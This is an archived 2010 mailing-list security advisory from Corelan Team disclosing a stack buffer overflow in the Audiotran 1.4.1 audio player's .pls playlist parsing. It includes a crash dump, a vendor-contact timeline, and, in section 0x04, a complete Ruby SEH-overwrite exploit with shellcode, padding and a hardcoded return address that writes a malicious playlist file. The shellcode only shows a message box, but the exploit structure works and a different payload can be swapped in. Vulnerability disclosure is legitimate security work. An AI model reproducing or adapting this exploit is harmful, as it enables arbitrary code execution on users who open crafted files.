lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <C0641B79F7D6A44791BA8FA35BC143F90153A1A66D93@apollo.corelan.be>
Date: Sat, 9 Jan 2010 20:02:59 +0100
From: Security <security@...elan.be>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	"secalert@...urityreason.com" <secalert@...urityreason.com>,
	"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"vuln@...unia.com" <vuln@...unia.com>
Cc: Corelan Team <Corelan.Team@...elan.be>
Subject: [CORELAN-10-001] Audiotran 1.4.1 buffer overflow

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@...elan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory          : CORELAN-10-001
Disclosure date   : January 9th, 2010
Corelan reference : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-001-audiotran-buffer-overflow/



0x00 : Vulnerability information
--------------------------------

[*] Product : Audiotran
[*] Version : 1.4.1
[*] Vendor : E-Soft
[*] URL : http://www.e-soft.co.uk/Audiotran.htm
[*] Platform : Windows
[*] Type of vulnerability : Stack overflow
[*] Risk rating : Medium
[*] Issue fixed in version : not fixed
[*] Vulnerability discovered by : Sebastien Duquette
[*] Greetings to : corelanc0d3r, rick2600, mr_me & MarkoT from Corelan Team


0x01 : Vendor description of software
-------------------------------------
>From the vendor website:
"Audiotran is an audio player with speed and pitch changer."


0x02 : Vulnerability details
----------------------------
Audiotran suffers from a stack overflow in the handling of playlist files.
Here is the content of memory after the overflow :

Registers:
eax=00000041 ebx=ffffffff ecx=ffffffff edx=00000002 esi=00130000 edi=01adcf48
eip=01a83db6 esp=0012de90 ebp=0012e060 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
AdjMmsEng!djWaveformAnalyzerMouseActionGet+0x45863:
01a83db6 8806            mov     byte ptr [esi],al          ds:0023:00130000=41

SEH chain:
0012e7dc: <Unloaded_nr.dll>+41414140 (41414141)
Invalid exception stack at 41414141

Call stack:
0012e060 01a7b862 AdjMmsEng!djWaveformAnalyzerMouseActionGet+0x45863
0012e07c 01a0be1b AdjMmsEng!djWaveformAnalyzerMouseActionGet+0x3d30f
0012e7e8 41414141 AdjMmsEng!djLrcFileTimeEnhancedTagsGetAt+0x13696
0012e7ec 41414141 <Unloaded_nr.dll>+0x41414140

By opening a specially crafted playlist (.pls), it is possible to execute
arbitrary code.


0x03 : Vendor communication
---------------------------
[*] 30/12/2009 : vendor contacted
[*] No response
[*] 09/01/2010 : public disclosure

Note: The same vulnerability was disclosed in a software from
E-Soft (DJ Studio Pro) 3 months ago and is still unpatched.


0x04 : Exploit
--------------
#!/usr/bin/ruby
# Audiotran 1.4.1 Win XP SP2/SP3 English BOF SEH Exploit

# Corelan Team MsgBox
payload =
"\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
"\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
"\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
"\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
"\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
"\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
"\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
"\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
"\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
"\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
"\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
"\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
"\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
"\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
"\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
"\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
"\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
"\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
"\x6c\x79\x58"

f = File.new("audiotran_poc.pls", 'w')
f.write 'A' * 1308 #padding
f.write "\xeb\x06\x90\x90"
f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
f.write payload
f.write 'A' * 9000 # padding
f.close




This transmission is intended only for use by the intended recipient(s).  If you are not an intended recipient you should not read, disclose, copy, circulate or in any other way use the information contained in this transmission.  The information contained in this transmission may be confidential and/or privileged.  If you have received this transmission in error, please notify the sender immediately and delete this transmission including any attachments.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ